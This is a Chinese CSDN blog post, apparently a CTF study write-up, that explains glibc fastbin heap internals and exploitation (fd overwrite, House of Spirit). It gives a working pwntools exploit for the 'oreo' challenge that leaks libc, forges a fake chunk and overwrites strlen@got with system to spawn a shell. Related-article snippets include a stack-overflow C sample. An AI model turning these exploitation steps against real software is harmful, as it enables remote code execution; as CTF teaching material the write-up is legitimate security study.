Linux 堆溢出之fastbin实例

最新推荐文章于 2022-07-13 20:23:01 发布
最新推荐文章于 2022-07-13 20:23:01 发布
阅读量3.9k 收藏 7
点赞数 1
分类专栏: PWN 文章标签: 堆溢出 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guiguzi5512407/article/details/53132470
版权

0x00. 前言

最近在学习Linux上的堆溢出原理以及利用技巧,深深了解到堆溢出的复杂之处,以及各种层出不穷的技巧。然时间比较紧,只能慢慢学,现记录下学习fastbin的心得。

0x01. fastbin原理

关于fastbin的利用原理,网上已经有很多文章介绍,简要介绍下需要了解的知识点。
Linux的堆管理器ptmalloc,将内存划分为多个chunk,以chunk为单位分配个用户。为了提高内存分配的效率,ptmalloc又设计的一些数据结构帮助提高性能。正是由于提高效率,从而忽略了一些安全问题。
1) Linux下的堆块 chunk,为了提高效率,chunk头一般很小。chunk的种类: 已分配的块(allocated chunk)、空闲块(free chunk)、最高块(top chunk)、最后剩余块(Last Remainder chunk)。
一般空闲块头包含:前一个chunk的大小(pre_size)、本chunk的大小(size)、下一个块地址(fd)、上一个块地址(bk)。已分配的块不包含fd和bk字段,并且已分配的块还会使用下一个块的 pre_size字段。而且由于chunk的字节对齐,低位一般作为标志位,用于辅助chunk管理。如32位系统,堆块chunk大小是8字节对齐,其低3位(N|M|P):N表示此块是否属于main arean; M表示此块是否是mmap()创建的; P表示前块是否正在使用。
2) Linux下的堆块采用链表结构管理,glibc下实现叫做bins,有4中bins:fastbin、unsorted bin、small bin、large bin。其中fastbin主要用于高效的分配和回收比较小的内存块,采用LIFO形式的单链表结构。
32位系统中,用户的请求在16bytes到64bytes会被分配到fastbin中;64位系统中,用户的请求在32bytes到128bytes会被分配到fastbin中。其他的几种结构主要是用户管理一般块和较大块。

0x02. fastbin利用技巧

基于fastbin块LIFO的特点,我们可以先申请,然后释放,再申请就可以得到原来地址的块。但是这不能满足我们的需求,我们需要在将堆分配在可控地址。我们可以通过堆溢出更改已经申请块的fd,使其指向我们可控的地址,并且在可控地址上伪造假的fastbin结构。然后释放,再申请两次,第2次就可以得到分配在可控地址上的块。(覆盖fd)
还有一种方法直接修改free函数的参数,使free函数的参数为可控地址,然后在可控地址上伪造假的堆块。(House of Spirit)

0x03. fastbin实例

1) oreo
该题是个典型的fastbin,主要思路:在bss段构造假的fastbin块结构,然后利用fastbin分配堆块,并写入一个地址。第2次对这个可控位置写入数据,就可以达到往任意地址写任意数据(write anything anywhere)。利用ELF中的逻辑,先通过地址泄漏得到system函数的地址,然后利用fastbin覆盖strlen@got.plt地址为system函数地址。这其中有个技巧,第二次写入数据是”p32(system_addr) + ‘;/bin/sh’ “,在覆盖strlen@got.plt的同时,后面system函数执行时,会分开执行,system(system_addr)和system(“/bin/sh”),最终会成功获得shell。
漏洞利用代码:

#!/usr/bin/env python

from pwn import *

DEBUG = 1
if DEBUG:
    context.log_level = 'debug'
    p = process('./oreo')
    gdb.attach(p, execute='b *0x8048a4d')
else:
    p = remote("xxxx", 1008)


def add_rifles(name, description):
    p.sendline('1')
    p.sendline(name)
    p.sendline(description)

def order_rifles():
    p.sendline('3')

def leave_message(msg):
    p.sendline('4')
    p.sendline(msg)

def show_rifles():
    p.sendline('2')


def main():

    fgets_got = 0x0804A23C
    strlen_got = 0x0804A250
    msg_addr = 0x804A2A8

    p.recv(0x261)
    for i in range(0x3f):
        add_rifles("abc", "test")

    # leak system address 
    payload1 = 'A' * 27 + p32(fgets_got)
    add_rifles(payload1, 'B' * 25)
    show_rifles()
    p.recvuntil("===================================")
    p.recvuntil("===================================")
    p.recvuntil("Name: ")
    p.recvuntil("\nDescription: ")
    fgets_addr = u32(p.recv(4))
    print "fgets address: %x" % fgets_addr
    system_addr = fgets_addr - 0x232f0

    # malloc chunk 
    payload2 = 'A' * 27 + p32(msg_addr)
    add_rifles(payload2, 'B' * 25)

    # construct fake chunk
    payload3 = p32(0x0) *9 + p32(0x49)
    leave_message(payload3)

    #free chunk
    order_rifles()

    #fastbin: malloc new chunk at address 0x804a2a8
    add_rifles('name', p32(strlen_got))

    #write strlen_got with system_addr and execute strlen('p32(system_addr);/bin/sh')
    leave_message(p32(system_addr) + ';/bin/sh')

    p.interactive()

if __name__ == '__main__':
    main()
M021
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
两种 fastbin attack 方法做 2014 hack.lu oreo
哒君的博客
07-31 584
终于第一次自己独立做出一道完整的题 方法一: ctf-wiki 很详细,不多赘述 方法二: 与 ctf-wiki 的思路类似,最终也是控制message的指针来达到任意地址写的目的 但是此处用的是 Arbitrary Alloc ,即控制fastbin块的fd指针来达成目的 具体请看exp的注释 exp: from pwn import * from LibcSearcher import ...
fastbin attack
m0_64195960的博客
07-19 1374
FastbinDoubleFree是指fastbin的chunk可以被多次释放,因此可以在fastbin链表中存在多次。这样导致的后果是多次分配可以从fastbin链表中取出同一个块,相当于多个指针指向同一个块,结合块的数据内容可以实现类似于类型混淆(typeconfused)的效果。FastbinDoubleFree能够成功利用主要有两部分的原因fastbin块被释放后next_chunk的pre_inuse位不会被清空1.1.1该技术的核心。......
[pwn]fastbin attack详解
热门推荐
Breeze的博客
12-31 1万+
[pwn]fastbin attack 文章目录[pwn]fastbin attackfastbin attack原理double freeuse after freechunk extend需要注意的点:0ctf:babyheap fastbin attack原理 fastbin attack是利用fastbin分配原理的漏洞,利用要求是我们能够修改“已释放”块。通常情况下与double fr...
fastbin attack快速入门
abelxu
11-13 1030
0x01 fastbin简介 Fastbin包含0x20~0x80大小bin的数组指针,用于快速分配小块。fastbin按照单链表结构进行组织,相同大小的bin在同一个链表中,fd指向下一个bin,采用LIFO(Last In First Out)机制。在fastbin中,块的inuse标志都为1,处于占用状态,防止chunk释放时进行合并,加快小块的分配。 正常fastbin的使用 通过这个简单的案例来了解fastbin的单链表结构,malloc和free的过程。 #include<stdio
【pwn学习】溢出(一)
Morphy_Amo的博客
01-05 4224
pwn中溢出的学习
Linux笔记--简介
一只青木呀
08-08 892
Linux笔记--简介1、前言2、的由来3、Linux简介4、分类4.1、请求4.2、释放5、内存分配背后的系统调用6、相关数据结构7、的申请8、调试验证 1、前言 当前针对各大平台主要有如下几种内存管理机制: 平台 管理机制 dlmalloc General purpose allocator ptmalloc2 glibc jemalloc FreeBSD and Firefox tcmalloc Google libumem Solaris 在
Linux下基本栈溢出攻击
01-30
基本的栈溢出攻击,是最早产生的一种缓冲区溢出攻击方法,它是所有其他缓冲区溢出攻击的基础。但是,由于这种攻击方法产生的时间比较长,故而GCC编译器、Linux操作系统提供了一些机制来阻止这种攻击方法对系统产生...
Windows平台下的溢出利用技术
02-26
开头我讨论了在旧版本Windows下利用溢出的技术,试着给读者提供一些关于unlink过程是怎样执行的、以及freelist[n]里面的flink/blink是如何被攻击者控制并提供简单的任意“4字节写”操作的实用的知识。本文的主要...
linux解决Tomcat内存溢出的问题
09-15
下面小编就为大家带来一篇linux解决Tomcat内存溢出的问题。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Java 内存溢出原因分析
08-25
主要介绍了Java 内存溢出原因分析,任何使用过基于 Java 的企业级后端应用的软件开发者都会遇到过这种报错,java.lang.OutOfMemoryError:Java heap space。,需要的朋友可以参考下
关于java内存溢出的几种情况
12-22
 java.lang.OutOfMemoryError: Java heap space:这种是java内存不够,一个原因是真不够,另一个原因是程序中有死循环;  如果是java内存不够的话,可以通过调整JVM下面的配置来解决:  <jvm>-Xms3062m ...
溢出攻击教程(heap overflow attack)
05-12
溢出攻击教程(heap overflow attack)
见微知著(一):解析ctf中的pwn--Fast bin里的UAF
weixin_30826761的博客
12-14 307
  在网上关于ctf pwn的入门资料和writeup还是不少的,但是一些过渡的相关知识就比较少了,大部分赛棍都是在不断刷题中总结和进阶的。所以我觉得可以把学习过程中的遇到的一些问题和技巧总结成文,供大家参考和一起交流。当然,也不想搞那些烂大街的东西,所以,打算从一道道pwn题开始,见微知著,在题目中延伸。 一:工欲善其事必先利其器   ubuntu14.01 64位(该版本对pwnto...
Fastbin attack
aoque9909的博客
06-25 396
Fastbin Attack 暂时接触到了两种针对分配机制中fastbin的攻击方式,double free和house of spirit Double free 基本原理 与uaf是对free之后的指针直接进行操作不同,double free通过利用fastbin的分配机制,改写在fastbin中的chunk,实现对指定内存的块分配。 先正常释放chunk1和c...
漏洞挖掘——fastbin attack漏洞
董哥的黑板报
08-12 3078
一、核心思想 通过fastbins链的管理,达到目标地址(target)读写 二、原理图解 fastbin存储freechunk的单链表结构: fastbins是如何存取fastchunk的,见文章:https://blog.csdn.net/qq_41453285/article/details/97613588 第一步:我们知道被free的chunk会被放入到arena所管理的f...
linux内存管理深入分析,【技术分享】Linux溢出Fastbin Attack实例详解
weixin_29231263的博客
04-30 306
v预估稿费:400RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿1. 摘要在近几年各大CTF比赛中,看到有很多次pwn类别题中出现fastbin攻击的情况,例如今年的defcon,RCTF,胖哈勃杯,0CTF final等等 ,fastbin attack是漏洞利用中十分常用、易用且有效的一种攻击方式,在网上的中文资料中,对其原理上进行讲述的文章有一些,但详细讲述如何...
linux 利用基础知识
sky123博客
07-13 3085
ptmalloc2 是目前 Linux 标准发行版中使用的分配器。malloc 函数返回对应大小字节的内存块的指针。此外,该函数还对一些异常情况进行了处理:用以扩展 chunk,相邻 chunk 闲置且空间充足则会进行合并,否则会重新分配 chunk。即通过 realloc 我们可以完成对一个 chunk 的 free,也就是说在特殊情况下 realloc 是可以当作 free 使用的,其中,在size 为 0 的情况下,realloc 函数会调用 free 释放该 chunk。该函数在分配时会清空 ch
32位栈溢出进阶
ca1m4n的博客
11-18 696
在804871F里,buf变成a1,把a1放入s,然后往804871F的buf里输入数据,这一步要注意,我们要做的是通过传入数据,把v5覆盖掉,因为返回值是v5,而v5和buf的关系在stack里是这样的。接着v5返回到主函数,变成v2,传到80487D0里,80487D0里变成a1, 因为我们传入的a1为\xff(255),所以执行else, 这时我们开始ret2libc。会停止,于是开头为\x00,最终比较的长度v1是0,从而绕过strncmp,避免执行exit(0)没有system和/bin/sh/
漏洞挖掘中的bins分类(fastbin、unsorted bin、small bin、large bin)
董哥的黑板报
07-23 1万+
一、bin链的介绍 bin是一个由struct chunk结构体组成的链表 前面介绍过,不同的chunk根据特点不同分为不同的chunk,为了将这些chunk进行分类的管理,glibc采用了bin链这种方式管理不同的chunk 不同的bin链是由arena管理的 bin链中的chunk均为free chunk 二、bin链分类 根据bin链成员的大小不同,分为以下几类: fast bi...
linux溢出实例,如何在Linux中发现溢出问题?
最新发布
05-24
1. 溢出实例: ```c #include <stdio.h> #include <stdlib.h> void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; ret = buffer1 + 21; (*ret) += 8; } int main() { int x; x = 0; function(1,2,3); x = 1; printf("%d\n",x); return 0; } ``` 上述代码中,`function` 函数中声明了两个缓冲区 `buffer1` 和 `buffer2`,它们的大小分别为 5 和 10 字节。在 `function` 函数中,我们试图通过 `(*ret) += 8;` 来修改返回地址,从而实现栈溢出攻击。运行此程序时,会发现输出结果为 1,也就是说攻击成功。 2. 如何在 Linux 中发现溢出问题? 在 Linux 中,我们可以使用 `gdb` 来调试程序,以检查是否存在溢出问题。具体步骤如下: - 编译程序时添加 `-g` 选项,以便在调试时可以获取更多的信息。 - 使用 `gdb` 打开可执行文件。 - 使用 `run` 命令运行程序,程序会在 `function` 函数中出现段错误并崩溃。 - 使用 `backtrace` 命令查看函数调用栈,可以看到 `function` 函数中的返回地址已经被修改。 - 使用 `info frame` 命令查看当前帧的信息,可以看到修改后的返回地址。 - 使用 `info registers` 命令查看寄存器的值,可以看到 `eip` 寄存器的值已经被修改。 - 使用 `x/20x $esp` 命令查看栈的内容,可以看到返回地址已经被修改。 通过以上步骤,我们可以发现程序存在溢出问题,并进一步分析和修复这个问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值